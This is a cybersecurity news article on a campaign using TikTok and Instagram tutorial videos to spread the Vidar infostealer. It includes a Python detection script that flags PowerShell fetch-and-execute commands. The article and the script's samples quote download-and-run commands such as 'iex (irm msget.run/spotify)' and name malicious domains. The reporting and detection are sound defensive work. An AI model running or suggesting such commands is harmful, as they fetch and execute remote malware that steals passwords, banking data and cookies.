Scammers Use TikTok and Instagram Reels to Spread Vidar Infostealer

ReversingLabs reveals how hackers exploit social media engagement metrics to deliver Vidar infostealer malware to thousands of unsuspecting users.

Scammers are using a new method to trap social media users by hiding malicious files inside short videos. Threat intelligence firm ReversingLabs found that hackers are exploiting TikTok and Instagram Reels to distribute Vidar infostealer.

Unlike standard phishing emails that carry infected links, these campaigns manipulate the social media platforms themselves so that the malicious content spreads virally.

This trick relies on tutorial-style videos that promise free access to paid applications like Spotify Premium or Microsoft Word. Scammers have ensured the clips look professional, using clear graphics and automated voiceovers to establish authority.

Turning commands into traps

In one identified technique, scammers create accounts with usernames like windows.tips and a blue and white crown logo that mimics the official Windows icon. The videos instruct viewers to open PowerShell on their Windows computers and type in a specific command: iex irm.

This deceptive instruction makes PowerShell quietly connect to a remote server, fetch a malicious payload, and execute it. For example, users are told to point the command at a domain called msget.run/spotify, and because the video appears legitimate, they run the code without checking what is being downloaded.
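From the defender's side, the pairing is recognisable in PowerShell logs: iex is the built-in alias for Invoke-Expression and irm the alias for Invoke-RestMethod, so the command fetches text from a URL and hands it straight to the interpreter. The script below is an added example, not code from ReversingLabs or Hackread, that scans constructed script-block log entries (what Script Block Logging records) for that fetch-then-execute pairing and pulls out the remote location. The sample log lines, the example.invalid URLs and the function names are assumptions made for the example; msget.run is the domain named in the article.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed sample of PowerShell script-block log entries. Only msget.run comes
# from the article; the other hosts and commands are invented for this example.
SAMPLE_SCRIPT_BLOCKS = [
    "iex (irm msget.run/spotify)",
    "Invoke-Expression (Invoke-RestMethod -Uri 'https://example.invalid/office')",
    "iwr https://example.invalid/setup.ps1 | iex",
    "Get-ChildItem C:\\Users -Recurse | Measure-Object",
    "irm https://api.github.com/repos/PowerShell/PowerShell/releases/latest",
    'iex "Get-Date"',
]

# Domain reported in the article; a real deployment would load this from threat intel.
KNOWN_BAD_DOMAINS = {"msget.run"}

# Execution primitive: Invoke-Expression or its alias iex.
EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
# Fetch primitives: Invoke-RestMethod / Invoke-WebRequest (and aliases) or WebClient methods.
FETCH = re.compile(
    r"\b(?:irm|invoke-restmethod|iwr|invoke-webrequest|downloadstring|downloadfile)\b",
    re.IGNORECASE,
)
# Host with optional scheme and path; the scheme is optional because the videos
# show bare hosts such as msget.run/spotify.
URL = re.compile(
    r"(?:https?://)?(?P<host>[a-z0-9-]+(?:\.[a-z0-9-]+)+)(?P<path>/[^\s'\")]*)?",
    re.IGNORECASE,
)


@dataclass
class Finding:
    script: str
    url: Optional[str]
    severity: str


def is_download_cradle(script: str) -> bool:
    """True when a script both fetches remote content and passes it to Invoke-Expression."""
    return bool(EXEC.search(script) and FETCH.search(script))


def classify(script: str) -> Optional[Finding]:
    """Return a Finding for a download cradle, or None for benign script blocks.

    A fetch alone (e.g. irm against a public API) is not flagged; only the
    combination with iex / Invoke-Expression is, which keeps noise low.
    """
    if not is_download_cradle(script):
        return None
    match = URL.search(script)
    url = match.group(0) if match else None
    host = match.group("host").lower() if match else None
    severity = "critical" if host in KNOWN_BAD_DOMAINS else "high"
    return Finding(script=script, url=url, severity=severity)


def find_download_cradles(blocks: Iterable[str]) -> List[Finding]:
    """Scan a stream of script-block entries and keep only the flagged ones."""
    return [f for f in (classify(b) for b in blocks) if f is not None]


if __name__ == "__main__":
    for finding in find_download_cradles(SAMPLE_SCRIPT_BLOCKS):
        print(f"[{finding.severity}] {finding.url!r} <- {finding.script}")
```

Run against the sample, the first three entries are flagged (the msget.run one as critical) and the remaining three are not, including the plain irm call to a public API and the iex that runs a local string. In practice the same check can be expressed as a SIEM rule over Event ID 4104 script-block text; the value of requiring both halves is that legitimate scripts use irm and iwr constantly, but rarely pipe the result into Invoke-Expression.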

A TikTok video tricking users into following malicious commands and infecting their devices with malware (Source: ReversingLabs)

“Social media users executing this command may trust the video on face value, without verifying what is being downloaded,” ReversingLabs researcher Zaria Vuksan noted in the blog post shared with Hackread.com.

The second strategy targets user curiosity through casual clips. Scammers post videos showing off premium app features over trending background music and encourage viewers to comment with words like ok to learn the secret.

Once a user replies, the hacker sends a direct message directing them to fake download sites like d4ug.site, which claims to unlock premium games and AI tools but actually redirects victims to dead-end surveys or malicious links.

The viral delivery system

According to ReversingLabs’ analysis, these videos succeed by gaming platform algorithms. Recommendation systems heavily favour content that users save or share, and because people tend to save tutorials to check later, the system pushes these clips to wider audiences, researchers explained. One of the videos tracked during the investigation received 109,000 views, 1,699 saves, and 974 shares.

Upon following the instructions, a file named build.exe is dropped onto the user’s computer; it contains Vidar Infostealer, a widely used information stealer sold on underground marketplaces under a malware-as-a-service (MaaS) model.

Cybercriminals can buy a lifetime license for 300 dollars to steal all kinds of data, including passwords, banking data, and browser cookies. Vidar infostealer was updated recently to make it much more stable and better at evading automated security filters.

Defending against these campaigns is difficult because hackers can delete warning comments left by past victims. ReversingLabs reported the scam accounts to Instagram, but the platform rejected the alerts.

Researchers are now urging users to avoid entering untrusted commands into terminal utilities, and businesses must train staff to spot scams hiding on consumer social feeds. Being prepared is the ultimate defence in this case.

“There are likely many more variations of videos with the same intentions. People are looking for scams in their email inboxes and text messages, but not as much on their social media feeds. Especially when these posts are under the guise of being helpful, rather than the urgency or sob stories associated with stereotypical phishing attempts. These videos can pop up at any time, so it is important that organizations stay prepared,” researchers concluded.

Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage.